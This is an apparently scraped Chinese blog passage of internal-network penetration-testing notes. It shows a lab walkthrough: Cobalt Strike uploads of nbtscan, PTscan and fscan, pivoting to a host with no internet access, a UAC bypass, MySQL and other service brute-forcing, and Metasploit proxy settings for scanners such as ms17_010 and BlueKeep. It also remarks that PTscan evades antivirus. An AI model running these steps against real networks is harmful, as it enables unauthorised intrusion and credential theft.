赞
踩
上传nbtscan和dll程序
upload D:\内网\tools\信息收集\nbtscan\nbtscan.exe
上传后用nbtscan命令扫描内网其他网段
shell nbtscan.exe 192.168.52.0/24
此时直接上线Win2016肯定是不行的,因为目标不出网无法访问到kali,所以要通过Win2012进行中转上线
上传nbtscan
upload D:\内网\tools\信息收集\nbtscan\nbtscan.exe
但此时运行之后,发现权限不足,尝试提权后提权失败,所以尝试bypassuac,提权后成功扫出内网主机
PTscan(Phantom scanner) 是一款界面友好的轻量级web应用资产扫描器,适合于内网渗透测试环境下web的资产快捷识别,只需Python环境,无需第三方扩展库,扫描结果使用zoomeye网页样式。
下载地址:https://github.com/phantom0301/PTscan
PS:不会被杀软查杀
installer库打包成exe下载链接
pyinstaller -F PTscan.py
使用说明
Usage: python PTscan.py {-f /xxx/xxx.txt or -h 192.168.1} [-p 21,80,3306] [-m 50] [-t 10] [-n] [-b] [-r]
PTscan.exe -h 192.168.52 -p 80 -m 10 -t 10 -n -b
-f 指定扫描目标文件,文件格式如list.txt所示,同时支持IP和URL
-h 指定扫描IP或IP段,支持段扫描,如192.168.1 即为扫描C段,192.168 即为扫描B段
-p 指定扫描端口,缺省使用程序中的配置端口
-m 指定线程数
-t 指定timeout
-n 不进行ping操作,直接扫描
-b 开启Banner识别
-r ReverseIP
上传
upload D:\内网\tools\信息收集\PTscan-master\PTscan.exe
扫描完后,会在当然目录生成一个文件,非常直观
fscan是一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。
存活主机
fscan.exe -h ip或者网段
服务爆破
fscan.exe -h ip -m -h 查看可爆破的服务(-m指定服务类型 -h帮助命令)
mysql爆破
fscan64.exe -h 192.168.52.154 -m mysql #使用默认的字典
fscan64.exe -h 192.168.52.154 -m mysql -userf user.txt -pwdf passwd.txt #使用指定的字典
默认对全部服务爆破
fscan64.exe -h 192.168.52.154,192.168.52.157 -m all -userf user.txt -pwdf passwd.txt
先将cs上线的靶机创建个代理,便于CS连接
setg Proxies socks4:192.168.142.129:57374
setg ReverseAllowProxy true
windows
设置好代理后,即可使用扫描器进行扫描了
linux
扫linux可以用ssh_version
search ssh_version
use auxiliary/scanner/ssh/ssh_version
mssql
use auxiliary/scanner/mssql/mssql_ping
rdp
search rdp_scanner
http
search http_version
auxiliary/scanner/http/http_version
ms17_010
seach ms17_010
use auxiliary/scanner/smb/smb_ms17_010
2019_0708
该漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的。这个漏洞是2019年里危害严重性最大的漏洞,跟之前的勒索,永恒之蓝病毒差不多。
search 2019_0708
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
nbname
search nbname
use auxiliary/scanner/netbios/nbname
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。